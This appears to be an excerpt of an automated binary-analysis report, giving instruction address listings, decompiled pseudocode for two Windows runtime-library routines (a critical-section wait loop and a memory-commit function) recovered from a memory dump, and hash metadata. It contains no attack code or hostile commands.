                                                                                  0x00edfb92
                                                                                  0x00edfb94
                                                                                  0x00edfb9a
                                                                                  0x00edfb9b
                                                                                  0x00edfba1
                                                                                  0x00f1bde8
                                                                                  0x00f1bdeb
                                                                                  0x00f1bded
                                                                                  0x00f1beb5
                                                                                  0x00f1beb5
                                                                                  0x00f1bebb
                                                                                  0x00f1bebd
                                                                                  0x00f1bec3
                                                                                  0x00f1bed2
                                                                                  0x00f1bedd
                                                                                  0x00f1bedd
                                                                                  0x00f1beed
                                                                                  0x00000000
                                                                                  0x00f1bdf3
                                                                                  0x00f1bdfe
                                                                                  0x00f1be06
                                                                                  0x00f1be0b
                                                                                  0x00f1be0d
                                                                                  0x00f1be0f
                                                                                  0x00f1be14
                                                                                  0x00f1be19
                                                                                  0x00f1be20
                                                                                  0x00f1be25
                                                                                  0x00f1be27
                                                                                  0x00f1be35
                                                                                  0x00f1be39
                                                                                  0x00f1be46
                                                                                  0x00f1be4f
                                                                                  0x00f1be54
                                                                                  0x00f1be56
                                                                                  0x00f1bef8
                                                                                  0x00f1bef8
                                                                                  0x00000000
                                                                                  0x00f1be5c
                                                                                  0x00f1be5c
                                                                                  0x00f1be60
                                                                                  0x00000000
                                                                                  0x00f1be66
                                                                                  0x00f1be66
                                                                                  0x00f1be7f
                                                                                  0x00f1be84
                                                                                  0x00f1be87
                                                                                  0x00f1be89
                                                                                  0x00f1be8b
                                                                                  0x00f1be99
                                                                                  0x00f1be9d
                                                                                  0x00f1bea0
                                                                                  0x00f1beac
                                                                                  0x00f1beaf
                                                                                  0x00f1beb1
                                                                                  0x00f1beb3
                                                                                  0x00f1beb3
                                                                                  0x00000000
                                                                                  0x00f1bea2
                                                                                  0x00f1bea2
                                                                                  0x00000000
                                                                                  0x00f1bea2
                                                                                  0x00f1be8d
                                                                                  0x00f1be8d
                                                                                  0x00f1be92
                                                                                  0x00000000
                                                                                  0x00f1be92
                                                                                  0x00f1be8b
                                                                                  0x00f1be60
                                                                                  0x00f1be3b
                                                                                  0x00f1be3b
                                                                                  0x00f1be3e
                                                                                  0x00000000
                                                                                  0x00f1be40
                                                                                  0x00f1be40
                                                                                  0x00f1be44
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f1be44
                                                                                  0x00f1be3e
                                                                                  0x00f1be29
                                                                                  0x00f1be29
                                                                                  0x00000000
                                                                                  0x00f1be29
                                                                                  0x00f1be27
                                                                                  0x00000000
                                                                                  0x00edfba7
                                                                                  0x00edfba7
                                                                                  0x00edfbab
                                                                                  0x00f1bf02
                                                                                  0x00edfbb1
                                                                                  0x00edfbb1
                                                                                  0x00edfbb8
                                                                                  0x00edfbbd
                                                                                  0x00edfbbd
                                                                                  0x00edfbbf
                                                                                  0x00edfbbf
                                                                                  0x00edfbc5
                                                                                  0x00edfbcb
                                                                                  0x00edfbf8
                                                                                  0x00edfbf8
                                                                                  0x00edfbfa
                                                                                  0x00000000
                                                                                  0x00edfc00
                                                                                  0x00edfc00
                                                                                  0x00edfc03
                                                                                  0x00000000
                                                                                  0x00edfc09
                                                                                  0x00edfc09
                                                                                  0x00edfc0f
                                                                                  0x00edfc15
                                                                                  0x00edfc23
                                                                                  0x00edfc23
                                                                                  0x00edfc25
                                                                                  0x00edfc27
                                                                                  0x00edfc75
                                                                                  0x00edfc7c
                                                                                  0x00edfc84
                                                                                  0x00000000
                                                                                  0x00edfc29
                                                                                  0x00edfc29
                                                                                  0x00edfc2d
                                                                                  0x00edfc30
                                                                                  0x00f1bf0f
                                                                                  0x00000000
                                                                                  0x00edfc36
                                                                                  0x00edfc38
                                                                                  0x00edfc3b
                                                                                  0x00edfc41
                                                                                  0x00f1bf17
                                                                                  0x00f1bf19
                                                                                  0x00f1bf48
                                                                                  0x00f1bf4b
                                                                                  0x00000000
                                                                                  0x00f1bf1b
                                                                                  0x00f1bf22
                                                                                  0x00f1bf24
                                                                                  0x00f1bf26
                                                                                  0x00000000
                                                                                  0x00f1bf2c
                                                                                  0x00f1bf37
                                                                                  0x00f1bf39
                                                                                  0x00f1bf3b
                                                                                  0x00000000
                                                                                  0x00f1bf41
                                                                                  0x00f1bf41
                                                                                  0x00f1bf41
                                                                                  0x00f1bf41
                                                                                  0x00f1bf45
                                                                                  0x00000000
                                                                                  0x00f1bf45
                                                                                  0x00f1bf3b
                                                                                  0x00f1bf26
                                                                                  0x00000000
                                                                                  0x00edfc47
                                                                                  0x00edfc47
                                                                                  0x00edfc49
                                                                                  0x00edfcb2
                                                                                  0x00edfcb4
                                                                                  0x00edfcb6
                                                                                  0x00edfcdc
                                                                                  0x00edfcdc
                                                                                  0x00000000
                                                                                  0x00edfcb8
                                                                                  0x00edfcc3
                                                                                  0x00edfcc5
                                                                                  0x00edfcc7
                                                                                  0x00000000
                                                                                  0x00edfcc9
                                                                                  0x00edfcc9
                                                                                  0x00edfccd
                                                                                  0x00000000
                                                                                  0x00edfccd
                                                                                  0x00edfcc7
                                                                                  0x00000000
                                                                                  0x00edfc4b
                                                                                  0x00edfc4b
                                                                                  0x00edfc4e
                                                                                  0x00edfc4e
                                                                                  0x00edfc51
                                                                                  0x00edfc51
                                                                                  0x00edfc54
                                                                                  0x00edfc5a
                                                                                  0x00edfc5c
                                                                                  0x00edfc5f
                                                                                  0x00edfc61
                                                                                  0x00edfc63
                                                                                  0x00edfc65
                                                                                  0x00edfc67
                                                                                  0x00edfc6e
                                                                                  0x00edfc72
                                                                                  0x00edfc72
                                                                                  0x00edfc72
                                                                                  0x00edfc72
                                                                                  0x00edfc67
                                                                                  0x00edfc61
                                                                                  0x00000000
                                                                                  0x00edfc5a
                                                                                  0x00edfc49
                                                                                  0x00edfc41
                                                                                  0x00edfc30
                                                                                  0x00edfc27
                                                                                  0x00edfc03
                                                                                  0x00edfbcd
                                                                                  0x00edfbd3
                                                                                  0x00edfbd9
                                                                                  0x00edfbdc
                                                                                  0x00edfbde
                                                                                  0x00edfc99
                                                                                  0x00edfc9b
                                                                                  0x00edfc9d
                                                                                  0x00edfcd5
                                                                                  0x00edfcd5
                                                                                  0x00edfc89
                                                                                  0x00edfc89
                                                                                  0x00000000
                                                                                  0x00edfc9f
                                                                                  0x00edfc9f
                                                                                  0x00edfca3
                                                                                  0x00000000
                                                                                  0x00edfca3
                                                                                  0x00000000
                                                                                  0x00edfbe4
                                                                                  0x00edfbe4
                                                                                  0x00edfbe4
                                                                                  0x00edfbe4
                                                                                  0x00edfbe9
                                                                                  0x00edfbf2
                                                                                  0x00000000
                                                                                  0x00edfbf2
                                                                                  0x00edfbde
                                                                                  0x00edfbcb
                                                                                  0x00edfbab
                                                                                  0x00edfc8b
                                                                                  0x00edfc8b
                                                                                  0x00edfc8c
                                                                                  0x00edfb80
                                                                                  0x00edfb72
                                                                                  0x00edfb5e
                                                                                  0x00edfc8d
                                                                                  0x00edfc91
                                                                                  0x00edfadf
                                                                                  0x00edfadf
                                                                                  0x00edfae1
                                                                                  0x00edfae4
                                                                                  0x00edfae7
                                                                                  0x00edfaec
                                                                                  0x00edfaf8
                                                                                  0x00edfb00
                                                                                  0x00edfb07
                                                                                  0x00edfb0f
                                                                                  0x00edfb0f
                                                                                  0x00edfb07
                                                                                  0x00000000
                                                                                  0x00edfaf8
                                                                                  0x00edfadd

                                                                                  Strings
                                                                                  • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00F1BE0F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                  • API String ID: 0-865735534
                                                                                  • Opcode ID: 8d68dc1f964b0ee813bf9682b6482c4d042cc218caa8976200b4579aeeefcff7
                                                                                  • Instruction ID: 5b5477b06cc7aa8e2998e13e45a63e25887ca1e1403e571640cbba44ed4cd92d
                                                                                  • Opcode Fuzzy Hash: 8d68dc1f964b0ee813bf9682b6482c4d042cc218caa8976200b4579aeeefcff7
                                                                                  • Instruction Fuzzy Hash: 6BA1FF31B1060ACBDB25DB68C850BEAB3A5EF48724F14557BE846EB791DB30DD429B80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 63%
                                                                                  			E00EA2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                                                  				signed char _v8;
                                                                                  				signed int _v12;
                                                                                  				signed int _v16;
                                                                                  				signed int _v20;
                                                                                  				signed int _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				signed int _v52;
                                                                                  				void* __esi;
                                                                                  				void* __ebp;
                                                                                  				intOrPtr _t55;
                                                                                  				signed int _t57;
                                                                                  				signed int _t58;
                                                                                  				char* _t62;
                                                                                  				signed char* _t63;
                                                                                  				signed char* _t64;
                                                                                  				signed int _t67;
                                                                                  				signed int _t72;
                                                                                  				signed int _t77;
                                                                                  				signed int _t78;
                                                                                  				signed int _t88;
                                                                                  				intOrPtr _t89;
                                                                                  				signed char _t93;
                                                                                  				signed int _t97;
                                                                                  				signed int _t98;
                                                                                  				signed int _t102;
                                                                                  				signed int _t103;
                                                                                  				intOrPtr _t104;
                                                                                  				signed int _t105;
                                                                                  				signed int _t106;
                                                                                  				signed char _t109;
                                                                                  				signed int _t111;
                                                                                  				void* _t116;
                                                                                  
                                                                                  				_t102 = __edi;
                                                                                  				_t97 = __edx;
                                                                                  				_v12 = _v12 & 0x00000000;
                                                                                  				_t55 =  *[fs:0x18];
                                                                                  				_t109 = __ecx;
                                                                                  				_v8 = __edx;
                                                                                  				_t86 = 0;
                                                                                  				_v32 = _t55;
                                                                                  				_v24 = 0;
                                                                                  				_push(__edi);
                                                                                  				if(__ecx == 0xf95350) {
                                                                                  					_t86 = 1;
                                                                                  					_v24 = 1;
                                                                                  					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                                                  				}
                                                                                  				_t103 = _t102 | 0xffffffff;
                                                                                  				if( *0xf97bc8 != 0) {
                                                                                  					_push(0xc000004b);
                                                                                  					_push(_t103);
                                                                                  					E00EE97C0();
                                                                                  				}
                                                                                  				if( *0xf979c4 != 0) {
                                                                                  					_t57 = 0;
                                                                                  				} else {
                                                                                  					_t57 = 0xf979c8;
                                                                                  				}
                                                                                  				_v16 = _t57;
                                                                                  				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                                                  					_t93 = _t109;
                                                                                  					L23();
                                                                                  				}
                                                                                  				_t58 =  *_t109;
                                                                                  				if(_t58 == _t103) {
                                                                                  					__eflags =  *(_t109 + 0x14) & L"ersists, try restarting the physical computer.\r\n";
                                                                                  					_t58 = _t103;
                                                                                  					if(__eflags == 0) {
                                                                                  						_t93 = _t109;
                                                                                  						E00ED1624(_t86, __eflags);
                                                                                  						_t58 =  *_t109;
                                                                                  					}
                                                                                  				}
                                                                                  				_v20 = _v20 & 0x00000000;
                                                                                  				if(_t58 != _t103) {
                                                                                  					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                                                  				}
                                                                                  				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                                                  				_t88 = _v16;
                                                                                  				_v28 = _t104;
                                                                                  				L9:
                                                                                  				while(1) {
                                                                                  					if(E00EC7D50() != 0) {
                                                                                  						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                                                  					} else {
                                                                                  						_t62 = 0x7ffe0382;
                                                                                  					}
                                                                                  					if( *_t62 != 0) {
                                                                                  						_t63 =  *[fs:0x30];
                                                                                  						__eflags = _t63[0x240] & 0x00000002;
                                                                                  						if((_t63[0x240] & 0x00000002) != 0) {
                                                                                  							_t93 = _t109;
                                                                                  							E00F3FE87(_t93);
                                                                                  						}
                                                                                  					}
                                                                                  					if(_t104 != 0xffffffff) {
                                                                                  						_push(_t88);
                                                                                  						_push(0);
                                                                                  						_push(_t104);
                                                                                  						_t64 = E00EE9520();
                                                                                  						goto L15;
                                                                                  					} else {
                                                                                  						while(1) {
                                                                                  							_t97 =  &_v8;
                                                                                  							_t64 = E00EDE18B(_t109 + 4, _t97, 4, _t88, 0);
                                                                                  							if(_t64 == 0x102) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t93 =  *(_t109 + 4);
                                                                                  							_v8 = _t93;
                                                                                  							if((_t93 & 0x00000002) != 0) {
                                                                                  								continue;
                                                                                  							}
                                                                                  							L15:
                                                                                  							if(_t64 == 0x102) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t89 = _v24;
                                                                                  							if(_t64 < 0) {
                                                                                  								L00EFDF30(_t93, _t97, _t64);
                                                                                  								_push(_t93);
                                                                                  								_t98 = _t97 | 0xffffffff;
                                                                                  								__eflags =  *0xf96901;
                                                                                  								_push(_t109);
                                                                                  								_v52 = _t98;
                                                                                  								if( *0xf96901 != 0) {
                                                                                  									_push(0);
                                                                                  									_push(1);
                                                                                  									_push(0);
                                                                                  									_push(0x100003);
                                                                                  									_push( &_v12);
                                                                                  									_t72 = E00EE9980();
                                                                                  									__eflags = _t72;
                                                                                  									if(_t72 < 0) {
                                                                                  										_v12 = _t98 | 0xffffffff;
                                                                                  									}
                                                                                  								}
                                                                                  								asm("lock cmpxchg [ecx], edx");
                                                                                  								_t111 = 0;
                                                                                  								__eflags = 0;
                                                                                  								if(0 != 0) {
                                                                                  									__eflags = _v12 - 0xffffffff;
                                                                                  									if(_v12 != 0xffffffff) {
                                                                                  										_push(_v12);
                                                                                  										E00EE95D0();
                                                                                  									}
                                                                                  								} else {
                                                                                  									_t111 = _v12;
                                                                                  								}
                                                                                  								return _t111;
                                                                                  							} else {
                                                                                  								if(_t89 != 0) {
                                                                                  									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                                                  									_t77 = E00EC7D50();
                                                                                  									__eflags = _t77;
                                                                                  									if(_t77 == 0) {
                                                                                  										_t64 = 0x7ffe0384;
                                                                                  									} else {
                                                                                  										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                  									}
                                                                                  									__eflags =  *_t64;
                                                                                  									if( *_t64 != 0) {
                                                                                  										_t64 =  *[fs:0x30];
                                                                                  										__eflags = _t64[0x240] & 0x00000004;
                                                                                  										if((_t64[0x240] & 0x00000004) != 0) {
                                                                                  											_t78 = E00EC7D50();
                                                                                  											__eflags = _t78;
                                                                                  											if(_t78 == 0) {
                                                                                  												_t64 = 0x7ffe0385;
                                                                                  											} else {
                                                                                  												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                  											}
                                                                                  											__eflags =  *_t64 & 0x00000020;
                                                                                  											if(( *_t64 & 0x00000020) != 0) {
                                                                                  												_t64 = E00F27016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                                                  											}
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  								return _t64;
                                                                                  							}
                                                                                  						}
                                                                                  						_t97 = _t88;
                                                                                  						_t93 = _t109;
                                                                                  						E00F3FDDA(_t97, _v12);
                                                                                  						_t105 =  *_t109;
                                                                                  						_t67 = _v12 + 1;
                                                                                  						_v12 = _t67;
                                                                                  						__eflags = _t105 - 0xffffffff;
                                                                                  						if(_t105 == 0xffffffff) {
                                                                                  							_t106 = 0;
                                                                                  							__eflags = 0;
                                                                                  						} else {
                                                                                  							_t106 =  *(_t105 + 0x14);
                                                                                  						}
                                                                                  						__eflags = _t67 - 2;
                                                                                  						if(_t67 > 2) {
                                                                                  							__eflags = _t109 - 0xf95350;
                                                                                  							if(_t109 != 0xf95350) {
                                                                                  								__eflags = _t106 - _v20;
                                                                                  								if(__eflags == 0) {
                                                                                  									_t93 = _t109;
                                                                                  									E00F3FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						_push("RTL: Re-Waiting\n");
                                                                                  						_push(0);
                                                                                  						_push(0x65);
                                                                                  						_v20 = _t106;
                                                                                  						E00F35720();
                                                                                  						_t104 = _v28;
                                                                                  						_t116 = _t116 + 0xc;
                                                                                  						continue;
                                                                                  					}
                                                                                  				}
                                                                                  			}




































                                                                                  0x00ea2d8a
                                                                                  0x00ea2d8a
                                                                                  0x00ea2d92
                                                                                  0x00ea2d96
                                                                                  0x00ea2d9e
                                                                                  0x00ea2da0
                                                                                  0x00ea2da3
                                                                                  0x00ea2da5
                                                                                  0x00ea2da8
                                                                                  0x00ea2dab
                                                                                  0x00ea2db2
                                                                                  0x00eff9aa
                                                                                  0x00eff9ab
                                                                                  0x00eff9ae
                                                                                  0x00eff9ae
                                                                                  0x00ea2db8
                                                                                  0x00ea2dc2
                                                                                  0x00eff9b9
                                                                                  0x00eff9be
                                                                                  0x00eff9bf
                                                                                  0x00eff9bf
                                                                                  0x00ea2dcf
                                                                                  0x00eff9c9
                                                                                  0x00ea2dd5
                                                                                  0x00ea2dd5
                                                                                  0x00ea2dd5
                                                                                  0x00ea2dde
                                                                                  0x00ea2de1
                                                                                  0x00ea2e70
                                                                                  0x00ea2e72
                                                                                  0x00ea2e72
                                                                                  0x00ea2de7
                                                                                  0x00ea2deb
                                                                                  0x00ea2e7c
                                                                                  0x00ea2e83
                                                                                  0x00ea2e85
                                                                                  0x00ea2e8b
                                                                                  0x00ea2e8d
                                                                                  0x00ea2e92
                                                                                  0x00ea2e92
                                                                                  0x00ea2e85
                                                                                  0x00ea2df1
                                                                                  0x00ea2df7
                                                                                  0x00ea2df9
                                                                                  0x00ea2df9
                                                                                  0x00ea2dfc
                                                                                  0x00ea2dff
                                                                                  0x00ea2e02
                                                                                  0x00000000
                                                                                  0x00ea2e05
                                                                                  0x00ea2e0c
                                                                                  0x00eff9d9
                                                                                  0x00ea2e12
                                                                                  0x00ea2e12
                                                                                  0x00ea2e12
                                                                                  0x00ea2e1a
                                                                                  0x00eff9e3
                                                                                  0x00eff9e9
                                                                                  0x00eff9f0
                                                                                  0x00eff9f6
                                                                                  0x00eff9f8
                                                                                  0x00eff9f8
                                                                                  0x00eff9f0
                                                                                  0x00ea2e23
                                                                                  0x00effa02
                                                                                  0x00effa03
                                                                                  0x00effa05
                                                                                  0x00effa06
                                                                                  0x00000000
                                                                                  0x00ea2e29
                                                                                  0x00ea2e29
                                                                                  0x00ea2e2e
                                                                                  0x00ea2e34
                                                                                  0x00ea2e3e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ea2e44
                                                                                  0x00ea2e47
                                                                                  0x00ea2e4d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ea2e4f
                                                                                  0x00ea2e54
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ea2e5a
                                                                                  0x00ea2e5f
                                                                                  0x00ea2e9a
                                                                                  0x00ea2ea4
                                                                                  0x00ea2ea5
                                                                                  0x00ea2ea8
                                                                                  0x00ea2eaf
                                                                                  0x00ea2eb2
                                                                                  0x00ea2eb5
                                                                                  0x00effae9
                                                                                  0x00effaeb
                                                                                  0x00effaed
                                                                                  0x00effaef
                                                                                  0x00effaf7
                                                                                  0x00effaf8
                                                                                  0x00effafd
                                                                                  0x00effaff
                                                                                  0x00effb04
                                                                                  0x00effb04
                                                                                  0x00effaff
                                                                                  0x00ea2ec0
                                                                                  0x00ea2ec4
                                                                                  0x00ea2ec6
                                                                                  0x00ea2ec8
                                                                                  0x00effb14
                                                                                  0x00effb18
                                                                                  0x00effb1e
                                                                                  0x00effb21
                                                                                  0x00effb21
                                                                                  0x00ea2ece
                                                                                  0x00ea2ece
                                                                                  0x00ea2ece
                                                                                  0x00ea2ed7
                                                                                  0x00ea2e61
                                                                                  0x00ea2e63
                                                                                  0x00effa6b
                                                                                  0x00effa71
                                                                                  0x00effa76
                                                                                  0x00effa78
                                                                                  0x00effa8a
                                                                                  0x00effa7a
                                                                                  0x00effa83
                                                                                  0x00effa83
                                                                                  0x00effa8f
                                                                                  0x00effa91
                                                                                  0x00effa97
                                                                                  0x00effa9d
                                                                                  0x00effaa4
                                                                                  0x00effaaa
                                                                                  0x00effaaf
                                                                                  0x00effab1
                                                                                  0x00effac3
                                                                                  0x00effab3
                                                                                  0x00effabc
                                                                                  0x00effabc
                                                                                  0x00effac8
                                                                                  0x00effacb
                                                                                  0x00effadf
                                                                                  0x00effadf
                                                                                  0x00effacb
                                                                                  0x00effaa4
                                                                                  0x00effa91
                                                                                  0x00ea2e6f
                                                                                  0x00ea2e6f
                                                                                  0x00ea2e5f
                                                                                  0x00effa13
                                                                                  0x00effa15
                                                                                  0x00effa17
                                                                                  0x00effa1f
                                                                                  0x00effa21
                                                                                  0x00effa22
                                                                                  0x00effa25
                                                                                  0x00effa28
                                                                                  0x00effa2f
                                                                                  0x00effa2f
                                                                                  0x00effa2a
                                                                                  0x00effa2a
                                                                                  0x00effa2a
                                                                                  0x00effa31
                                                                                  0x00effa34
                                                                                  0x00effa36
                                                                                  0x00effa3c
                                                                                  0x00effa3e
                                                                                  0x00effa41
                                                                                  0x00effa43
                                                                                  0x00effa45
                                                                                  0x00effa45
                                                                                  0x00effa41
                                                                                  0x00effa3c
                                                                                  0x00effa4a
                                                                                  0x00effa4f
                                                                                  0x00effa51
                                                                                  0x00effa53
                                                                                  0x00effa56
                                                                                  0x00effa5b
                                                                                  0x00effa5e
                                                                                  0x00000000
                                                                                  0x00effa5e
                                                                                  0x00ea2e23

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Re-Waiting
                                                                                  • API String ID: 0-316354757
                                                                                  • Opcode ID: 16d2a501f9eddbddf3953ad37332af3ecb9108e2e51d293ab620afe12c378ce3
                                                                                  • Instruction ID: 02808db0a9032d82f0ac768b63bbba09300f7cc35282f778a650e84612823707
                                                                                  • Opcode Fuzzy Hash: 16d2a501f9eddbddf3953ad37332af3ecb9108e2e51d293ab620afe12c378ce3
                                                                                  • Instruction Fuzzy Hash: F9613830A006089FDB22DF6CC840B7E77E1EF4A718F2462A9E615BB2D2C774AD419791
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 80%
                                                                                  			E00F70EA5(void* __ecx, void* __edx) {
                                                                                  				signed int _v20;
                                                                                  				char _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				unsigned int _v32;
                                                                                  				signed int _v36;
                                                                                  				intOrPtr _v40;
                                                                                  				char _v44;
                                                                                  				intOrPtr _v64;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				signed int _t58;
                                                                                  				unsigned int _t60;
                                                                                  				intOrPtr _t62;
                                                                                  				char* _t67;
                                                                                  				char* _t69;
                                                                                  				void* _t80;
                                                                                  				void* _t83;
                                                                                  				intOrPtr _t93;
                                                                                  				intOrPtr _t115;
                                                                                  				char _t117;
                                                                                  				void* _t120;
                                                                                  
                                                                                  				_t83 = __edx;
                                                                                  				_t117 = 0;
                                                                                  				_t120 = __ecx;
                                                                                  				_v44 = 0;
                                                                                  				if(E00F6FF69(__ecx,  &_v44,  &_v32) < 0) {
                                                                                  					L24:
                                                                                  					_t109 = _v44;
                                                                                  					if(_v44 != 0) {
                                                                                  						E00F71074(_t83, _t120, _t109, _t117, _t117);
                                                                                  					}
                                                                                  					L26:
                                                                                  					return _t117;
                                                                                  				}
                                                                                  				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                  				_t5 = _t83 + 1; // 0x1
                                                                                  				_v36 = _t5 << 0xc;
                                                                                  				_v40 = _t93;
                                                                                  				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                                                  				asm("sbb ebx, ebx");
                                                                                  				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                                                  				if(_t58 != 0) {
                                                                                  					_push(0);
                                                                                  					_push(0x14);
                                                                                  					_push( &_v24);
                                                                                  					_push(3);
                                                                                  					_push(_t93);
                                                                                  					_push(0xffffffff);
                                                                                  					_t80 = E00EE9730();
                                                                                  					_t115 = _v64;
                                                                                  					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                                                  						_push(_t93);
                                                                                  						E00F6A80D(_t115, 1, _v20, _t117);
                                                                                  						_t83 = 4;
                                                                                  					}
                                                                                  				}
                                                                                  				if(E00F6A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                                                  					goto L24;
                                                                                  				}
                                                                                  				_t60 = _v32;
                                                                                  				_t97 = (_t60 != 0x100000) + 1;
                                                                                  				_t83 = (_v44 -  *0xf98b04 >> 0x14) + (_v44 -  *0xf98b04 >> 0x14);
                                                                                  				_v28 = (_t60 != 0x100000) + 1;
                                                                                  				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                                                  				_v40 = _t62;
                                                                                  				if(_t83 >= _t62) {
                                                                                  					L10:
                                                                                  					asm("lock xadd [eax], ecx");
                                                                                  					asm("lock xadd [eax], ecx");
                                                                                  					if(E00EC7D50() == 0) {
                                                                                  						_t67 = 0x7ffe0380;
                                                                                  					} else {
                                                                                  						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                  					}
                                                                                  					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                  						E00F6138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                                                  					}
                                                                                  					if(E00EC7D50() == 0) {
                                                                                  						_t69 = 0x7ffe0388;
                                                                                  					} else {
                                                                                  						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                  					}
                                                                                  					if( *_t69 != 0) {
                                                                                  						E00F5FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                                                  					}
                                                                                  					if(( *0xf98724 & 0x00000008) != 0) {
                                                                                  						E00F652F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                                                  					}
                                                                                  					_t117 = _v44;
                                                                                  					goto L26;
                                                                                  				}
                                                                                  				while(E00F715B5(0xf98ae4, _t83, _t97, _t97) >= 0) {
                                                                                  					_t97 = _v28;
                                                                                  					_t83 = _t83 + 2;
                                                                                  					if(_t83 < _v40) {
                                                                                  						continue;
                                                                                  					}
                                                                                  					goto L10;
                                                                                  				}
                                                                                  				goto L24;
                                                                                  			}
























                                                                                  0x00f70eb7
                                                                                  0x00f70eb9
                                                                                  0x00f70ec0
                                                                                  0x00f70ec2
                                                                                  0x00f70ecd
                                                                                  0x00f7105b
                                                                                  0x00f7105b
                                                                                  0x00f71061
                                                                                  0x00f71066
                                                                                  0x00f71066
                                                                                  0x00f7106b
                                                                                  0x00f71073
                                                                                  0x00f71073
                                                                                  0x00f70ed3
                                                                                  0x00f70ed6
                                                                                  0x00f70edc
                                                                                  0x00f70ee0
                                                                                  0x00f70ee7
                                                                                  0x00f70ef0
                                                                                  0x00f70ef5
                                                                                  0x00f70efa
                                                                                  0x00f70efc
                                                                                  0x00f70efd
                                                                                  0x00f70f03
                                                                                  0x00f70f04
                                                                                  0x00f70f06
                                                                                  0x00f70f07
                                                                                  0x00f70f09
                                                                                  0x00f70f0e
                                                                                  0x00f70f14
                                                                                  0x00f70f23
                                                                                  0x00f70f2d
                                                                                  0x00f70f34
                                                                                  0x00f70f34
                                                                                  0x00f70f14
                                                                                  0x00f70f52
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f70f58
                                                                                  0x00f70f73
                                                                                  0x00f70f74
                                                                                  0x00f70f79
                                                                                  0x00f70f7d
                                                                                  0x00f70f80
                                                                                  0x00f70f86
                                                                                  0x00f70fab
                                                                                  0x00f70fb5
                                                                                  0x00f70fc6
                                                                                  0x00f70fd1
                                                                                  0x00f70fe3
                                                                                  0x00f70fd3
                                                                                  0x00f70fdc
                                                                                  0x00f70fdc
                                                                                  0x00f70feb
                                                                                  0x00f71009
                                                                                  0x00f71009
                                                                                  0x00f71015
                                                                                  0x00f71027
                                                                                  0x00f71017
                                                                                  0x00f71020
                                                                                  0x00f71020
                                                                                  0x00f7102f
                                                                                  0x00f7103c
                                                                                  0x00f7103c
                                                                                  0x00f71048
                                                                                  0x00f71050
                                                                                  0x00f71050
                                                                                  0x00f71055
                                                                                  0x00000000
                                                                                  0x00f71055
                                                                                  0x00f70f88
                                                                                  0x00f70f9e
                                                                                  0x00f70fa2
                                                                                  0x00f70fa9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f70fa9
                                                                                  0x00000000

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `
                                                                                  • API String ID: 0-2679148245
                                                                                  • Opcode ID: 8308766dd9510a1a7f4f5251da75dff803b10c3902c6220d2b298f1c45a0ff52
                                                                                  • Instruction ID: be494c701d3742e855614c41220a010dc859f24ccb2e615d64112380fb0fd8d7
                                                                                  • Opcode Fuzzy Hash: 8308766dd9510a1a7f4f5251da75dff803b10c3902c6220d2b298f1c45a0ff52
                                                                                  • Instruction Fuzzy Hash: EC51AC712043419BD324DF28D881F1BB7E5FFC4714F04492EF98A97291DA35E94ADB62
